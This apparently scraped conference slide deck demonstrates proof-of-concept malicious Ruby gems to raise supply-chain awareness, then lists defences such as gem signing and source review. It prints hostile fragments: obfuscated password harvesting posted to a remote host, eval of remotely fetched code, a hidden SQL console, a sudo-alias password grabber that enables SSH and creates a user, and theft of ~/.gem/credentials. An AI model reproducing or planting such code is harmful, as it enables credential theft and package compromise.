Tweet
Tweet

Slide 1

Slide 1 text

Hacking with Gems Benjamin Smith @benjamin_smith Monday, June 17, 13

Slide 2

Slide 2 text

How-to get rich quick and (maybe) not go to jail! Monday, June 17, 13

Slide 3

Slide 3 text

Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer. Monday, June 17, 13

Slide 4

Slide 4 text

who i am Monday, June 17, 13

Slide 5

Slide 5 text

Monday, June 17, 13

Slide 6

Slide 6 text

Monday, June 17, 13

Slide 7

Slide 7 text

Monday, June 17, 13

Slide 8

Slide 8 text

what i am NOT Monday, June 17, 13

Slide 9

Slide 9 text

Monday, June 17, 13

Slide 10

Slide 10 text

please do not try this at home Monday, June 17, 13

Slide 11

Slide 11 text

please do not try this at home Monday, June 17, 13

Slide 12

Slide 12 text

Monday, June 17, 13

Slide 13

Slide 13 text

Monday, June 17, 13

Slide 14

Slide 14 text

Lawful Evil Lawful Good Monday, June 17, 13

Slide 15

Slide 15 text

Lawful Evil Lawful Good Monday, June 17, 13

Slide 16

Slide 16 text

Lawful Evil Lawful Good Monday, June 17, 13

Slide 17

Slide 17 text

Lawful Evil Lawful Good Monday, June 17, 13

Slide 18

Slide 18 text

once upon a time Monday, June 17, 13

Slide 19

Slide 19 text

GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12) actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ... Monday, June 17, 13

Slide 20

Slide 20 text

what’s the worst that could happen? Monday, June 17, 13

Slide 21

Slide 21 text

Monday, June 17, 13

Slide 22

Slide 22 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 23

Slide 23 text

before... github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 24

Slide 24 text

after! github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 25

Slide 25 text

some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 26

Slide 26 text

... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 27

Slide 27 text

?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 28

Slide 28 text

i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 29

Slide 29 text

i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 30

Slide 30 text

“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 31

Slide 31 text

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 32

Slide 32 text

profit • Step 1: do something • Step 2: do something else • Step 3: ???? • Step 4: profit Monday, June 17, 13

Slide 33

Slide 33 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4: Monday, June 17, 13

Slide 34

Slide 34 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: • Step 4: Monday, June 17, 13

Slide 35

Slide 35 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: Monday, June 17, 13

Slide 36

Slide 36 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit Monday, June 17, 13

Slide 37

Slide 37 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country Monday, June 17, 13

Slide 38

Slide 38 text

a one way ticket to Monday, June 17, 13

Slide 39

Slide 39 text

that was easy. what else can I do? Monday, June 17, 13

Slide 40

Slide 40 text

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 41

Slide 41 text

show me the hack Net::HTTP.post_form( #, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 42

Slide 42 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 43

Slide 43 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 44

Slide 44 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 45

Slide 45 text

...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 46

Slide 46 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 47

Slide 47 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 48

Slide 48 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 49

Slide 49 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 50

Slide 50 text

/users/sign_in github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 51

Slide 51 text

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 52

Slide 52 text

hello db access! github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 53

Slide 53 text

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 54

Slide 54 text

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 55

Slide 55 text

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

Slide 56

Slide 56 text

careful of wolves in sheep’s clothing Monday, June 17, 13

Slide 57

Slide 57 text

profit • Step 1: • Step 2: • Step 3: • Step 4: • Step 5: Monday, June 17, 13

Slide 58

Slide 58 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4: • Step 5: Monday, June 17, 13

Slide 59

Slide 59 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5: Monday, June 17, 13

Slide 60

Slide 60 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5: Monday, June 17, 13

Slide 61

Slide 61 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: Monday, June 17, 13

Slide 62

Slide 62 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country Monday, June 17, 13

Slide 63

Slide 63 text

i like the beach Monday, June 17, 13

Slide 64

Slide 64 text

that was easy. what else can I do? Monday, June 17, 13

Slide 65

Slide 65 text

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

Slide 66

Slide 66 text

what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1 Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

Slide 67

Slide 67 text

Monday, June 17, 13

Slide 68

Slide 68 text

what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

Slide 69

Slide 69 text

better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0 8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

Slide 70

Slide 70 text

behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

Slide 71

Slide 71 text

what what github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

Slide 72

Slide 72 text

i can haz source github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

Slide 73

Slide 73 text

truth time • this gem doesn't actually work • but it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

Slide 74

Slide 74 text

so much code so little time • Step 1: write a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country Monday, June 17, 13

Slide 75

Slide 75 text

that was easy hard. what else can I do? (that's easier) Monday, June 17, 13

Slide 76

Slide 76 text

gem install be_truthy github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 77

Slide 77 text

what it does > true.should be_true > User.new.should be_true > User.new.should be_truthy github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 78

Slide 78 text

what it ACTUALLY does github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 79

Slide 79 text

github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 80

Slide 80 text

file tree looks ok github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 81

Slide 81 text

source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 82

Slide 82 text

but what was this? github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 83

Slide 83 text

I see no C github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 84

Slide 84 text

run the what file? Gem::Specification.new do |gem| ... gem.extensions = ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 85

Slide 85 text

there is no Rakefile github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 86

Slide 86 text

the real file tree github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 87

Slide 87 text

the real file tree github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 88

Slide 88 text

what does the Rakefile do? github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 89

Slide 89 text

sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 90

Slide 90 text

File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 91

Slide 91 text

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 92

Slide 92 text

what does "sudo" do now? github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 93

Slide 93 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 94

Slide 94 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 95

Slide 95 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 96

Slide 96 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 97

Slide 97 text

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 98

Slide 98 text

/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl . -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 99

Slide 99 text

Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 100

Slide 100 text

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 101

Slide 101 text

take away: don't install ben's gems Monday, June 17, 13

Slide 102

Slide 102 text

Monday, June 17, 13

Slide 103

Slide 103 text

how could I get you to install my gems? Monday, June 17, 13

Slide 104

Slide 104 text

what gems are trustworthy? Monday, June 17, 13

Slide 105

Slide 105 text

how can I add my code to already trusted gems? Monday, June 17, 13

Slide 106

Slide 106 text

back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 107

Slide 107 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Monday, June 17, 13

Slide 108

Slide 108 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Monday, June 17, 13

Slide 109

Slide 109 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Monday, June 17, 13

Slide 110

Slide 110 text

now I own your gems github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 111

Slide 111 text

> git clone your-gem-repo ...add a little code... > rake build > gem push your-gem github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 112

Slide 112 text

do people trust your gems? Monday, June 17, 13

Slide 113

Slide 113 text

do people who install your gems have trustworthy gems? Monday, June 17, 13

Slide 114

Slide 114 text

Monday, June 17, 13

Slide 115

Slide 115 text

there’s still one problem Monday, June 17, 13

Slide 116

Slide 116 text

bootstrapping Monday, June 17, 13

Slide 117

Slide 117 text

being popular sucks Monday, June 17, 13

Slide 118

Slide 118 text

conferences Monday, June 17, 13

Slide 119

Slide 119 text

RubyJS Monday, June 17, 13

Slide 120

Slide 120 text

websocket Monday, June 17, 13

Slide 121

Slide 121 text

brakeman Monday, June 17, 13

Slide 122

Slide 122 text

rom Monday, June 17, 13

Slide 123

Slide 123 text

Monday, June 17, 13

Slide 124

Slide 124 text

Monday, June 17, 13

Slide 125

Slide 125 text

Monday, June 17, 13

Slide 126

Slide 126 text

[censored] Monday, June 17, 13

Slide 127

Slide 127 text

so what happens now? Monday, June 17, 13

Slide 128

Slide 128 text

ruby gems goes down Monday, June 17, 13

Slide 129

Slide 129 text

heroku deploys go down Monday, June 17, 13

Slide 130

Slide 130 text

i go to the beach Monday, June 17, 13

Slide 131

Slide 131 text

ruby gems goes down Monday, June 17, 13

Slide 132

Slide 132 text

heroku deploys go down Monday, June 17, 13

Slide 133

Slide 133 text

recovery Monday, June 17, 13

Slide 134

Slide 134 text

so what now? Monday, June 17, 13

Slide 135

Slide 135 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

Slide 136

Slide 136 text

Little Snitch obdev.at/products/littlesnitch/index.html Monday, June 17, 13

Slide 137

Slide 137 text

gem install be_truthy github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 138

Slide 138 text

fseventer fernlightning.com/doku.php?id=software:fseventer:start Monday, June 17, 13

Slide 139

Slide 139 text

don’t “gem install” from strangers Monday, June 17, 13

Slide 140

Slide 140 text

gem fetch vs gem install > gem fetch be_truthy > gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy Monday, June 17, 13

Slide 141

Slide 141 text

Monday, June 17, 13

Slide 142

Slide 142 text

Monday, June 17, 13

Slide 143

Slide 143 text

curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby Monday, June 17, 13

Slide 144

Slide 144 text

gem install rails -P HighSecurity Monday, June 17, 13

Slide 145

Slide 145 text

> gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR: While executing gem ... (Gem::Exception) Unsigned gem Monday, June 17, 13

Slide 146

Slide 146 text

gem cert --build Monday, June 17, 13

Slide 147

Slide 147 text

https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust Monday, June 17, 13

Slide 148

Slide 148 text

sandboxing Monday, June 17, 13

Slide 149

Slide 149 text

github.com/rubygems/rubygems Monday, June 17, 13

Slide 150

Slide 150 text

tools to detect malicious code Monday, June 17, 13

Slide 151

Slide 151 text

private gem repos Monday, June 17, 13

Slide 152

Slide 152 text

do not try this at home Monday, June 17, 13

Slide 153

Slide 153 text

don't install gems you don't need to Monday, June 17, 13

Slide 154

Slide 154 text

pay attention to what your gems do Monday, June 17, 13

Slide 155

Slide 155 text

monitor your system Monday, June 17, 13

Slide 156

Slide 156 text

read the source Monday, June 17, 13

Slide 157

Slide 157 text

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary Monday, June 17, 13

Slide 158

Slide 158 text

on install github.com/benjaminleesmith/coal-mine-canary Monday, June 17, 13

Slide 159

Slide 159 text

the results github.com/benjaminleesmith/coal-mine-canary Monday, June 17, 13

Slide 160

Slide 160 text

thank you! Monday, June 17, 13

Slide 161

Slide 161 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Monday, June 17, 13

Slide 162

Slide 162 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Monday, June 17, 13

Slide 163

Slide 163 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Monday, June 17, 13